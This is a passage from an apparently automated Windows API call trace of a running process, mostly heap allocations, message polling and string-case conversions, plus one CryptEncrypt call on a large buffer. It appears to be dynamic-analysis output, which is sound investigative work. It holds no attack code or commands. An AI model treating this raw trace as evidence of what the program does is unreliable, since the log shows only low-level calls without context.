(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.115] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0266.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0266.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.119] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.119] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.119] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0266.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.120] CharLowerBuffW (in: lpsz="byte[29128]", cchLength=0xb | out: lpsz="byte[29128]") returned 0xb [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0266.120] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0266.121] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0266.121] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.121] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0266.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0266.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.121] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.122] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.122] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0266.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0266.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.122] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0266.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0266.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.122] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24c5de8*, pdwDataLen=0x8bef68*=0x71c1, dwBufLen=0x71c8 | out: pbData=0x24c5de8*, pdwDataLen=0x8bef68*=0x71c8) returned 1 [0266.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0266.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0266.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0266.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0266.123] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0266.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0266.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0266.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.125] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0266.125] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.125] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0266.125] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.126] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.126] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0266.126] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.126] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0266.126] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.126] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.127] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.127] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0266.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.127] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.127] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0266.127] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.127] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.127] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0266.128] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.128] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.128] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.130] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.130] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.130] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.131] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0266.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.132] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.132] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0266.132] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0266.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.132] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0266.132] 